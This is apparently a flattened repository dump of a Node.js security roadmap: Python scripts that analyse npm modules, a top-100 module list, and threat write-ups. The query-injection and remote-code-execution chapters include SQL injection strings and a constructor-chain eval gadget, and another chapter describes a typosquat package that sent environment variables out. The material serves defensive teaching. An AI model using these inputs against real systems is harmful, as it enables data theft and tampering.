    if process.returncode == 0:
        violations.append('Passed')
    for error_match in _error_re.finditer(content):
        violation = error_match.group(1)
        for simplifier in _simplifier_res:
            simplified = simplifier.match(violation)
            if simplified:
                violation = '...'.join(simplified.groups())
                # Every simplifier is anchored on a distinct prefix, so
                # at most one of them can apply to a message.
                break
        violations.append(violation)
    return violations
135 | print "" 136 | print "Out of %d modules that parsed" % module_count 137 | print "" 138 | print "| Violation | Count of Modules | Total Count | Quartiles |" 139 | print "| --------- | ---------------- | ----------- | --------- |" 140 | for (v, vmap) in sorted(rule_violations.items()): 141 | count = 0 142 | total_count = 0 143 | values = vmap.values() 144 | for n in values: 145 | count += 1 146 | total_count += n 147 | values += [0] * (module_count - count) 148 | values.sort() 149 | quartiles = '%d / %d / %d' % ( 150 | values[len(values) >> 2], 151 | values[len(values) >> 1], 152 | values[(len(values) * 3) >> 2], 153 | ) 154 | print "| `%s` | %d | %d | %s |" % ( 155 | v, count, total_count, quartiles) 156 | -------------------------------------------------------------------------------- /appendix/lazy-load/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """Looks for lazy loading patterns. 18 | 19 | Patterns to identify include 20 | 21 | * { ... require(...) 
def requires(node_modules, module_name):
    """
    Follows require() calls to bound the set of JS files in a module.

    node_modules -- path to the node_modules directory.
    module_name -- name of the module, relative to node_modules.

    Returns {
      'srcs': [...],  # main.js and same-module files required thereof
      'deps': [...],  # required modules
      'upper': True,  # True when srcs and deps account for all require calls.
    }

    'srcs' and 'deps' are sorted tuples.  When package.json declares no
    "main", both are empty and 'upper' is False.

    Raises IOError/ValueError when the module's package.json cannot be
    read or parsed.
    """
    module_root = os.path.join(node_modules, module_name)
    # Binary mode lets json do the decoding instead of relying on the
    # locale's default encoding.
    with open(os.path.join(module_root, 'package.json'), 'rb') as pkg_file:
        package_json = json.load(pkg_file)
    main_files = package_json.get('main', None)
    # type(u'') is `unicode` on Python 2 and `str` on Python 3.
    if isinstance(main_files, (str, type(u''))):
        main_files = (main_files,)
    if not main_files:
        return {'srcs': (), 'deps': (), 'upper': False}

    srcs = set()
    deps = set()
    upper = True
    visited = set()
    unprocessed = [os.path.join(module_root, rp) for rp in main_files]
    while unprocessed:
        src = os.path.realpath(unprocessed.pop())
        if src in visited:
            continue
        visited.add(src)
        if os.path.isdir(src):
            # A directory stands for every JS file under it.
            unprocessed.extend(js_files_under(src))
            continue
        srcs.add(src)
        try:
            with open(src, 'r') as src_file:
                content = src_file.read()
        except (IOError, OSError, UnicodeError):
            # Unreadable source: its requires are unknown.
            upper = False
            continue
        src_dir = os.path.dirname(src)
        for match in _REQUIRE_RE.finditer(content):
            arg = match.group(1).strip()
            if not arg:
                continue  # Zero arguments
            is_quoted = (
                len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1])
            if not is_quoted:
                # Not a simple string literal, so the target is unknown.
                upper = False
                continue
            try:
                arg = json.loads('"%s"' % arg[1:-1])
            except ValueError:
                # Cannot decode the literal.  Do not record the raw,
                # still-quoted text as if it were a module name.
                upper = False
                continue
            if _REL_REQUIRE_RE.match(arg):
                if not arg.endswith('.js'):
                    arg += '.js'
                # Node.js resolves a relative require against the
                # directory of the requiring file, not against the
                # current working directory.
                unprocessed.append(os.path.join(src_dir, arg))
            else:
                deps.add(arg)
    return {
        'srcs': tuple(sorted(srcs)),
        'deps': tuple(sorted(deps)),
        'upper': upper
    }
# by visual examination of
# `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq`
# Matches, case-insensitively, a whole path segment (delimited by '/',
# '\\' or an end of the path) that names a test/demo/example/benchmark
# directory.  The dot in ".github" is written as [.] so that it matches
# only a literal dot.
_NON_PROD_PATH = re.compile(
    r'(?i)(?:^|[/\\])'
    r'(?:tests?|testdata|testing|[.]github|__tests__|demo|examples?'
    r'|benchmarks?)'
    r'(?:$|[/\\])')


def probable_non_prod_file(path):
    """
    True for paths that are probably not production code.

    Used to skip probable non-prod files when falling back to directory
    scanning.

    path -- a file or directory path using '/' or '\\' separators.

    Returns True when any whole segment of path matches _NON_PROD_PATH,
    False otherwise.
    """
    return _NON_PROD_PATH.search(path) is not None
58 | 59 | print ( 60 | """ 61 | ## Prod bundle includes test code {#test_code} 62 | 63 | Some of the top 100 modules are test code, e.g. mocha, chai. 64 | This measures which modules, when installed `--only=prod` include 65 | test patterns. 66 | 67 | %d of %d = %1.02f%% contain test code patterns 68 | """ % (uses, total_count, (100.0 * uses) / total_count)) 69 | -------------------------------------------------------------------------------- /appendix/top100.txt: -------------------------------------------------------------------------------- 1 | async 2 | babel-core 3 | babel-preset-es2015 4 | babel-runtime 5 | bluebird 6 | body-parser 7 | chalk 8 | cheerio 9 | classnames 10 | coffee-script 11 | colors 12 | commander 13 | debug 14 | express 15 | fs-extra 16 | glob 17 | gulp 18 | gulp-util 19 | jquery 20 | lodash 21 | minimist 22 | mkdirp 23 | moment 24 | prop-types 25 | q 26 | react 27 | react-dom 28 | request 29 | rxjs 30 | through2 31 | underscore 32 | uuid 33 | webpack 34 | winston 35 | yargs 36 | yeoman-generator 37 | @angular/common 38 | @angular/core 39 | aws-sdk 40 | axios 41 | babel-loader 42 | babel-polyfill 43 | chai 44 | co 45 | core-js 46 | css-loader 47 | ejs 48 | ember-cli-babel 49 | eslint 50 | handlebars 51 | inquirer 52 | joi 53 | js-yaml 54 | mocha 55 | mongodb 56 | mongoose 57 | node-uuid 58 | object-assign 59 | optimist 60 | ramda 61 | react-redux 62 | redis 63 | redux 64 | request-promise 65 | rimraf 66 | semver 67 | shelljs 68 | socket.io 69 | superagent 70 | xml2js 71 | yosay 72 | zone.js 73 | @angular/compiler 74 | @angular/forms 75 | @angular/http 76 | @angular/platform-browser 77 | @angular/platform-browser-dynamic 78 | @types/node 79 | angular 80 | autoprefixer 81 | babel-eslint 82 | babel-preset-react 83 | bootstrap 84 | cookie-parser 85 | dotenv 86 | es6-promise 87 | eslint-plugin-react 88 | extend 89 | extract-text-webpack-plugin 90 | file-loader 91 | immutable 92 | jade 93 | jsonwebtoken 94 | marked 95 | mime 96 | morgan 97 | mysql 
98 | nan 99 | node-sass 100 | path 101 | promise 102 | react-router 103 | style-loader 104 | typescript 105 | uglify-js 106 | underscore.string 107 | vue 108 | ws 109 | -------------------------------------------------------------------------------- /appendix/uses-scripts/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """Collates how many projects use install scripts. 
def uses_scripts(package_root):
    """
    True when a package declares an install-time script.

    package_root -- directory that contains the package's package.json.

    Returns True when the "scripts" entry of package.json has a
    "preinstall", "install" or "postinstall" key; False when there is
    no "scripts" entry or none of those keys is present.

    Raises IOError/ValueError when package.json cannot be read or parsed.
    """
    # Binary mode lets json do the decoding, and `with` closes the file
    # promptly even when many packages are scanned.
    with open(os.path.join(package_root, 'package.json'), 'rb') as pkg_file:
        package_json = json.load(pkg_file)
    scripts_obj = package_json.get('scripts', None)
    if scripts_obj is None:
        return False
    # TODO: True if empty value
    return any(
        script_type in scripts_obj
        for script_type in ('preinstall', 'install', 'postinstall'))
Assumes a basic familiarity with JS & the Node ecosystem.", 9 | "author": "Mike Samuel et al", 10 | "language": "en", 11 | "gitbook": ">= 3.0.0", 12 | "plugins": [ 13 | "links", 14 | "ga" 15 | ], 16 | "pluginsConfig": { 17 | # Google Analytics integration 18 | "ga": { 19 | "token": "UA-111883728-1", 20 | "configuration": { 21 | "anonymizeIp": true, 22 | "forceSSL": true 23 | } 24 | }, 25 | "links": { 26 | "links": [ 27 | { 28 | # Adds a printer icon at the top. 29 | # See styles/website.css for styling. 30 | "label": "Printable", 31 | # "icon" corresponds to a classname 32 | "icon": "print-button", 33 | # `make pdf` produces book.json which 34 | # needs to be copied into _book/ for 35 | # this to work. 36 | # TODO: Point to an authoritative version 37 | # via absolute URL once published. 38 | "url": "/node-sec-roadmap.pdf" 39 | }, 40 | { 41 | "label": "Github", 42 | "icon": "github-button", 43 | "url": "https://github.com/google/node-sec-roadmap" 44 | } 45 | ] 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /chapter-1/recap.md: -------------------------------------------------------------------------------- 1 | We've discussed the kinds of threats that concern us. 2 | 3 | Next we discuss how some Node.js projects mitigate these threats today 4 | and how we can make it easier for more Node.js projects to 5 | consistently mitigate these threats. 6 | 7 | Readers may find it useful to refer back to the [threat table][] which 8 | cross-indexes threats and mitigation strategies. 9 | 10 | [threat table]: threats.md#threat_table 11 | -------------------------------------------------------------------------------- /chapter-1/threat-0DY.md: -------------------------------------------------------------------------------- 1 | # Zero Day 2 | 3 | When a researcher discloses a new security vulnerability, the clock 4 | starts ticking. 
An attacker can compromise a product if they can 5 | weaponize the disclosure before the product team 6 | 7 | * realizes they're vulnerable, and 8 | * finds a patch to the vulnerable dependency, or rolls their own, and 9 | * tests the patched release and pushes it into production. 10 | 11 | ["The Best Defenses Against Zero-day Exploits for Various-sized 12 | Organizations"][sans] notes 13 | 14 | > Zero-day exploits are vulnerabilities that have yet to be publicly 15 | > disclosed. These exploits are usually the most difficult to defend 16 | > against because data is generally only available for analysis after 17 | > the attack has completed its course. 18 | 19 | > ... 20 | 21 | > The research community has broadly classified the defense techniques 22 | > against zero-day exploits as statistical-based, signature-based, 23 | > behavior-based, and hybrid techniques (Kaur & Singh, 2014). The 24 | > primary goal of each of these techniques is to identify the exploit in 25 | > real time or as close to real time as possible and quarantine the 26 | > specific attack to eliminate or minimize the damage caused by the 27 | > attack. 28 | 29 | Being able to respond quickly to limit damage and recover are 30 | critical. 31 | 32 | That same paper talks at length about *worms*: programs that 33 | compromise a system without explicit direction by a human attacker, 34 | and use the compromise of one system to find other systems to 35 | automatically compromise. 36 | 37 | Researchers have found ways ([details][saccone]) that worms 38 | might propagate throughout `registry.npmjs.org` and common practices 39 | that might allow a compromise to jump from the module repository to 40 | large numbers of production servers. 41 | 42 | If we can structure systems so that compromising one component 43 | does not make it easier to compromise another component, then 44 | we can contain damage due to worms. 
45 | 46 | If, in a population of components, we can keep susceptibility below a 47 | critical threshold so that worms spend more time searching for targets 48 | than compromising targets, then we can buy time for humans to 49 | understand and respond. 50 | 51 | If we prevent compromise of a population of modules by a zero day 52 | from causing widespread compromise of a population of production 53 | servers then we can limit damage to end users. 54 | 55 | [sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562 56 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf 57 | -------------------------------------------------------------------------------- /chapter-1/threat-BOF.md: -------------------------------------------------------------------------------- 1 | # Buffer Overflow 2 | 3 | A buffer overflow occurs when code fails to check an index into an 4 | array while unpacking input, allowing parts of that input to overwrite 5 | memory locations that other trusted code assumes are inviolable. 6 | A similar technique also allows exfiltrating data like cryptographic keys 7 | when an unchecked limit leads to copying unintended memory locations into 8 | an output. 9 | 10 | Buffer overflow vectors in Node.js are: 11 | 12 | * The Node.js runtime and dependencies like the JS runtime and OpenSSL 13 | * [C++ addons][] third-party modules that use N-API (the native API). 14 | * Child processes. For example, code may route a request body to an 15 | [image processing library][imagetragick] that was not 16 | written with untrusted inputs in mind. 17 | 18 | Buffer overflows are common, but we class them as low frequency for 19 | Node.js in particular. 
The runtime is highly reviewed compared to the 20 | average C++ backend; C++ addons are a small subset of third-party 21 | modules; and there's no reason to believe that child processes spawned 22 | by Node.js applications are especially risky. 23 | 24 | [imagetragick]: https://imagetragick.com/ 25 | [C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons 26 | -------------------------------------------------------------------------------- /chapter-1/threat-CRY.md: -------------------------------------------------------------------------------- 1 | # Weak Crypto {#CRY} 2 | 3 | Cryptographic primitives are often the only practical way to solve 4 | important classes of problems, but it's easy to make mistakes when using 5 | `crypto.*` APIs. 6 | Failing to identify third-party modules that use crypto (or should be 7 | using crypto) and determining whether they are using it properly can lead 8 | to a false sense of security. 9 | 10 | ["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel 11 | notes: 12 | 13 | > The field of cryptography is inherently difficult. Cryptographic API 14 | > development involves narrowing a large, complex field into a small set 15 | > of usable functions. Unfortunately, these APIs are often far from 16 | > simple. 17 | 18 | > ... 19 | 20 | > In 2013, study by Egele et al. revealed even more startling figures 21 | > [1]. In this study, six rules were defined which, if broken, indicated 22 | > the use of insecure protocols. More than 88% of the 11,000 apps 23 | > analyzed broke at least one rule. Of the rule-breaking apps, most 24 | > would break not just one, but multiple rules. Some of these errors 25 | > were attributed to negligence, for example test code included in 26 | > release versions. However, in most cases it appears developers 27 | > unknowingly created insecure apps. 28 | 29 | > ... 30 | 31 | > The human aspect can be improved through better education for 32 | > developers. 
Sadly, this approach is unlikely to be a complete 33 | > solution. It is unreasonable to expect a developer to be a security 34 | > expert when most of their time is spent on other aspects of software 35 | > design. 36 | 37 | Code that uses cryptography badly can seem like it's working as intended 38 | until an attacker unravels it. 39 | Testing code that uses cryptographic APIs is hard. It's hard to write 40 | a unit test to check that a skilled cryptographer can't efficiently 41 | extract information from a random looking string or compute a random 42 | looking string that passes a verifier. 43 | 44 | Weak cryptography can also mask other problems. For example, a 45 | security auditor might try to check for leaks of email addresses by 46 | creating a dummy account `Carol <carol@example.com>` and 47 | checking for the string `carol@example.com` in data served in responses, 48 | while recursing into substrings encoded using base64, gzip, or other 49 | common encodings. 50 | If some of that data is poorly encrypted, then the auditor might 51 | falsely conclude that an attacker who can't break strong 52 | encryption does not have access to emails. 53 | 54 | [Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf 55 | -------------------------------------------------------------------------------- /chapter-1/threat-DEX.md: -------------------------------------------------------------------------------- 1 | # Poor Developer Experience 2 | 3 | Security specialists have a vested interest in keeping developers 4 | happy & productive. 5 | 6 | Developer experience is not only a business or usability threat. When 7 | a team is less agile, it cannot respond as effectively to security 8 | threats, or roll out interfaces that let end users manage their own 9 | security and privacy.
10 | 11 | Application developers may miss deadlines, cut features, or 12 | compromise maintainability if any of the following are true: 13 | 14 | * starting a new project takes too long 15 | * they often cannot make progress until they get feedback from 16 | security specialists (or other specialists like I18N, Legal, UI) 17 | * repeated tasks are slow: 18 | * restarting an application or service, 19 | * running `npm install`, or 20 | * rerunning tests after small changes 21 | * getting approval for a pull request takes long enough that 22 | upstream has to be manually merged into the branch. 23 | * breaking common code out of an application into an npm 24 | module becomes hard, so it is easier to copy-paste from one 25 | application to another 26 | * a developer has to spend significant time getting a release 27 | candidate approved instead of working on the next iteration. 28 | -------------------------------------------------------------------------------- /chapter-1/threat-DOS.md: -------------------------------------------------------------------------------- 1 | 2 | # Denial of Service 3 | 4 | Denial of service occurs when a well-behaved, authorized user cannot 5 | access a system because of misbehavior by another. 6 | 7 | "Denial of service" is most often associated with [flooding][] a 8 | network endpoint so it cannot respond to the smaller number of 9 | legitimate requests, but there are other vectors: 10 | 11 | * Causing the server to use up [a finite resource][res-exh] 12 | like file descriptors causing threads to block. 13 | * Causing the target to issue a network request to an endpoint the 14 | attacker controls and responding slowly. 15 | * Causing the target to store malformed data which triggers an error 16 | in code that unpacks the stored data and causes a server to provide 17 | an error response to a well-formed request. 18 | * Exploiting event dispatch bugs to cause starvation 19 | ([example][disclosure]). 
20 | * Supplying over-large inputs to super-linear (> O(n)) algorithms. 21 | For example supplying a crafted string to an ambiguous `RegExp` 22 | to cause [excessive backtracking][]. 23 | 24 | Denial of service attacks that exploit the network layer are usually 25 | handled in the reverse proxy and we find no reason to suppose that 26 | node applications are especially vulnerable to other kinds of denial 27 | of service. 28 | 29 | ## Additional risk: Integrity depends on quick completion 30 | 31 | A system requires [atomicity][] when two or more effects have to 32 | happen together or not at all. Databases put a lot of engineering 33 | effort into ensuring atomicity. 34 | 35 | Sometimes, ad-hoc code seems to preserve atomicity when tested under 36 | low-load conditions: 37 | 38 | ```js 39 | // foo() and bar() need to happen together or not at all. 40 | foo(x); 41 | // Not much of a gap here under normal conditions for another part 42 | // of the system to observe foo() but not bar(). 43 | try { 44 | bar(x); 45 | } catch (e) { 46 | undoFoo(); 47 | throw e; 48 | } 49 | ``` 50 | 51 | This code, though buggy, may be highly reliable under normal 52 | conditions, but may fail under load, or if an attacker can cause 53 | `bar()` to run for a while before its side-effect happens, for example 54 | by causing excessive backtracking in a regular expression used to 55 | check a precondition. 56 | 57 | Some of the same techniques that make a system unavailable can 58 | widen the window of vulnerability within which an attacker can exploit 59 | an atomicity failure. 60 | 61 | Client-side, runaway computations rarely escalate into an integrity 62 | violation since atomicity requirements are typically maintained on the 63 | server. Server-side, we expect that this problem would be more 64 | common.
65 | 66 | [flooding]: https://capec.mitre.org/data/definitions/125.html 67 | [excessive backtracking]: https://www.regular-expressions.info/catastrophic.html 68 | [res-exh]: https://capec.mitre.org/data/definitions/131.html 69 | [disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug 70 | [atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity 71 | -------------------------------------------------------------------------------- /chapter-1/threat-EXF.md: -------------------------------------------------------------------------------- 1 | # Exfiltration of Data 2 | 3 | "Exfiltration" happens when an attacker causes a response to include 4 | data that it should not have. Web applications and services may 5 | produce response bodies that include too much information. 6 | 7 | This can happen when server-side JavaScript has access to more 8 | data than it needs to do its job and either 9 | 10 | * it serializes unintended information and no one notices or 11 | * an attacker controls what is serialized. 12 | 13 | Consider 14 | 15 | ```js 16 | Object.assign(output, this[str]); 17 | ``` 18 | 19 | If the attacker controls `str` then they may be able to pick any field 20 | of `this` or possibly any global field. 21 | 22 | This problem is not new to Node.js but we consider this higher 23 | frequency for Node.js for these reasons: 24 | 25 | * There is no equivalent to `Object.assign` in most backend languages. 26 | It's possible in Python and Java via reflective operators but 27 | security auditors can narrow down code that might suffer this vulnerability 28 | to those that use reflection. 29 | `Object.assign`, `$.extend` and similar operators are widely used in 30 | idiomatic JavaScript. 31 | * In most backend languages, `obj[...]` does not allow aliasing of all 32 | properties. 33 | For example, Python allows `obj[...]` on types that implement `__getitem__` 34 | which is not the case for user-defined classes. 
35 | Java has generic collections and maps, but for user-defined classes 36 | the equivalent code pattern requires reflection and possibly calls to 37 | `setAccessible(true)`. 38 | 39 | JavaScript makes it easier to alias properties and methods and common 40 | JavaScript idioms make it harder for security auditors to narrow down 41 | code that might inadvertently allow exfiltration. 42 | 43 | `Object.assign` and related copy operators are also potential 44 | [mass assignment][] vectors as in: 45 | 46 | ```js 47 | Object.assign(systemData, JSON.parse(untrustedInput)) 48 | ``` 49 | 50 | [mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability 51 | -------------------------------------------------------------------------------- /chapter-1/threat-LQC.md: -------------------------------------------------------------------------------- 1 | # Low Quality Code 2 | 3 | An application or service is vulnerable when its security depends on a 4 | module upholding a contract that it does not uphold. 5 | 6 | Most new software has bugs when first released. Over time, maintainers 7 | fix the bugs that have obvious, bad consequences. 8 | 9 | Often, widely used software has problem areas that are well understood. 10 | Developers can make a pragmatic decision to use it while taking 11 | additional measures to make sure those problems don't compromise 12 | security guarantees. 13 | 14 | Orphaned code that has not been updated recently may have done a 15 | good job of enforcing its contract, but attackers may have discovered 16 | new tricks, or the threat environment may have changed so it may 17 | no longer enforce its contract in the face of an attack. 18 | 19 | Low quality code constitutes a threat when developers pick a module 20 | without understanding the caveats to the contract it actually 21 | provides, or without taking additional measures to limit damage when 22 | it fails. 
23 | 24 | It may be the case that there's higher risk of poorly understood 25 | contracts when a community is experimenting rapidly as is the case for 26 | Node.js, or early on before the community has settled on clear winners 27 | for core functions, but we consider the frequency of vulnerabilities 28 | due to low quality code in the npm repository roughly the same as for 29 | other public module repositories. 30 | -------------------------------------------------------------------------------- /chapter-1/threat-MTP.md: -------------------------------------------------------------------------------- 1 | # Malicious Third-Party Code 2 | 3 | Most open-source developers work in good faith to provide useful tools 4 | to the larger community of developers but 5 | 6 | * Passwords are easy to guess, so attackers can suborn accounts that 7 | are only protected by a password. On GitHub, developers may 8 | configure their accounts to require a 9 | [second factor][github-second-factor] but this is not yet the norm. 10 | * Pull requests that aren't thoroughly reviewed may dilute security 11 | properties. 12 | * Phishing requests targeted at GitHub users ([details][dimnie]) can 13 | execute code on unwary committers' machines. 14 | * A pull request may appear to come from a higher-reputation source 15 | ([details][unsigned commits]). 16 | 17 | Malicious code can appear in the server-side JavaScript running in 18 | production, or can take the form of install hooks that run on a 19 | developer workstation with access to local repositories and to 20 | writable elements of `$PATH`. 21 | 22 | Projects that deploy the latest version of a dependency straight to 23 | production are more vulnerable to malicious code. If an attacker 24 | manages to publish a version with malicious code which is quickly 25 | discovered, it affects projects that deploy during that short "window 26 | of vulnerability." 
Projects that `npm install` the latest version 27 | straight to production are more likely to fall in that window than 28 | projects that cherrypick versions or that shrinkwrap to make sure that 29 | their development versions match deployed versions. 30 | 31 | [Bower is deprecated][bower-depr] so our discussions focus on 32 | `npmjs.org`, but it's worth noting that Bower has a single-point of 33 | failure. Anyone who can create a release branch can commit and 34 | publish a new version. 35 | 36 | [`npm profile`][npm profile] allows requiring 37 | [two factor auth][npm auth-and-writes] for publishing and privilege 38 | changes. If the npm accounts that can publish new versions of a 39 | package only checkout code from a GitHub account all of whose 40 | committers use two factors, then there is no single password that can 41 | compromise the system. 42 | 43 | The frequency of malicious code vulnerabilities affecting Node.js is 44 | probably roughly the same as that for other public module repositories. 45 | The npm repo has been a target in the past [1][getcookies-disclosure] 46 | [2][crossenv-typosquat-disclosure]. 47 | 48 | The [npm Blog][crossenv-typosquat-disclosure] explains what to do if 49 | you believe you have found malicious code: 50 | 51 | > On August 1, a user notified us via Twitter that a package with a 52 | > name very similar to the popular `cross-env` package was sending 53 | > environment variables from its installation context out to 54 | > npm.hacktask.net. We investigated this report immediately and took 55 | > action to remove the package. Further investigation led us to remove 56 | > about 40 packages in total. 57 | > 58 | > ... 59 | > 60 | > Please do reach out to us immediately if you find malware on the 61 | > registry. The best way to do so is by sending email to 62 | > [security@npmjs.com](mailto:security@npmjs.com). We will act to 63 | > clean up the problem and find related problems if we can. 
64 | 65 | 66 | [github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/ 67 | [bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/ 68 | [dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/ 69 | [unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html 70 | [npm profile]: https://docs.npmjs.com/cli/profile 71 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf 72 | [npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication 73 | [getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies 74 | [crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry 75 | -------------------------------------------------------------------------------- /chapter-1/threat-QUI.md: -------------------------------------------------------------------------------- 1 | # Query Injection 2 | 3 | [Query injection][] occurs when an attacker causes a query sent to a 4 | database or other backend to have a [structure][spp] that differs from 5 | that the developer intended. 6 | 7 | ```js 8 | connection.query( 9 | 'SELECT * FROM Table WHERE key="' + value + '"', 10 | callback); 11 | ``` 12 | 13 | If an attacker controls `value` and can cause it to contain a double 14 | quote, then they can cause execution of a query with a different structure.
15 | For example, if they can cause 16 | 17 | ```js 18 | value = ' " OR 1 -- two dashes start a line comment'; 19 | ``` 20 | 21 | then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...` 22 | which returns more rows than intended possibly [leaking](./threat-EXF.md) 23 | data that the requester should not have been able to access, and may 24 | cause other code that loops over the result set to modify rows other than 25 | the ones the system's authors intended. 26 | 27 | Some backends allow statement chaining so compromising a statement 28 | that seems to only read data: 29 | 30 | ```js 31 | value = '"; INSERT INTO Table ... --' 32 | ``` 33 | 34 | can violate system integrity by forging records: 35 | 36 | ```js 37 | ' SELECT * FROM Table WHERE key="' + value + '" ' === 38 | ' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" ' 39 | ``` 40 | 41 | or deny service via mass deletes. 42 | 43 | Query injection has a [long and storied history][hall-of-shame]. 44 | 45 | [Query injection]: http://bobby-tables.com/ 46 | [hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/ 47 | [spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property 48 | -------------------------------------------------------------------------------- /chapter-1/threat-RCE.md: -------------------------------------------------------------------------------- 1 | # Remote Code Execution 2 | 3 | Remote code execution occurs when the application interprets an 4 | untrustworthy string as code. When `x` is a string, `eval(x)`, 5 | `Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript 6 | engine's parser on `x`. If an attacker controls `x` then they can run 7 | arbitrary code in the context of the CommonJS module or `vm` context 8 | that invoked the parser. 
9 | 10 | Sandboxing can help but widely available sandboxes have 11 | [known workarounds][denicola-vm-run] though the [frozen realms][] 12 | proposal aims to change that. 13 | 14 | It is harder to execute remote code in server-side JavaScript. 15 | `this[x][y] = "javascript:console.log(1)"` does not cause code to 16 | execute for nearly as many `x` and `y` as in a browser. 17 | 18 | These operators are probably rarely used *explicitly*, but some 19 | operators that convert strings to code when given a string do 20 | something else when given a `Function` instance. `setTimeout(x, 0)` 21 | is safe when `x` is a function, but on the browser it parses a string 22 | input as code. 23 | 24 | * [Grepping](../appendix/experiments.md#grep-problems) shows the rate 25 | in the top 100 modules and their transitive dependencies by simple 26 | pattern matching after filtering out comments and string content. 27 | This analysis works on most modules, but fails to distinguish 28 | safe uses of `setTimeout` in modules that might run on 29 | the client from unsafe. 30 | * A [type based analysis](../appendix/experiments.md#jsconf) can 31 | distinguish between those two, but the tools we tested don't 32 | deal well with mixed JavaScript and TypeScript inputs. 33 | 34 | Even if we could reliably identify places where strings are 35 | *explicitly* converted to code for the bulk of npm modules, 36 | it is more difficult in JavaScript to statically prove that 37 | code does not *implicitly* invoke a parser than in other 38 | common backend languages. 39 | 40 | ```js 41 | // Let x be any value not in 42 | // (null, undefined, Object.create(null)). 
43 | var x = {}, 44 | // If the attacker can control three strings 45 | a = 'constructor', 46 | b = 'constructor', 47 | s = 'console.log(s)'; 48 | // and trick code into doing two property lookups 49 | // they control, a call with a string they control, 50 | // and one more call with any argument 51 | x[a][b](s)(); 52 | // then they can cause any side-effect achievable 53 | // solely via objects reachable from the global scope. 54 | // This includes full access to any exported module APIs, 55 | // all declarations in the current module, and access 56 | // to builtin modules like child_process, fs, and net. 57 | ``` 58 | 59 | Filtering out values of `s` that "look like JavaScript" as they reach 60 | server-side code will probably not prevent code execution. 61 | [Yosuke Hasegawa][Yosuke] showed how to reencode arbitrary JavaScript using 62 | only 6 punctuation characters, and that number may 63 | [fall to 5][Masato]. ["Web Application Obfuscation"][obfusc] by 64 | Heiderich et al. catalogues ways to bypass filtering. 65 | 66 | `eval` also allows remote-code execution in Python, PHP, and 67 | Ruby code, but in those languages `eval` operators are harder to 68 | mention implicitly which means uses are easier to check. 69 | 70 | It is possible to dynamically evaluate strings even in statically 71 | compiled languages, for example, [JSR 223][] and 72 | [`javax.compiler`][dynjava] for Java. In statically compiled 73 | languages there is no short implicit path to `eval` and it is not 74 | easier to `eval` an untrusted input than to use an interpreter that is 75 | isolated from the host environment. 76 | 77 | We consider remote code execution in Node.js lower frequency than for 78 | client-side JavaScript without a Content-Security-Policy but higher 79 | than for other backend languages. We consider the severity the same 80 | as for other backend languages.
The severity is higher than for 81 | client-side JavaScript because backend code often has access to more 82 | than one user's data and privileged access to other backends. 83 | 84 | [denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0 85 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms 86 | [Yosuke]: https://news.ycombinator.com/item?id=4370098 87 | [Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html 88 | [obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049 89 | [JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html 90 | [dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html 91 | -------------------------------------------------------------------------------- /chapter-1/threat-SHP.md: -------------------------------------------------------------------------------- 1 | # Shell Injection during Production 2 | 3 | [Shell injection][] occurs when an attacker-controlled string changes 4 | the structure of a command passed to a shell or causes a child process 5 | to execute an unintended command or with unintended arguments. 6 | Typically, this is because code or a dependency invokes 7 | [child\_process][api/child_process] with an argument partially 8 | composed from untrusted inputs. 9 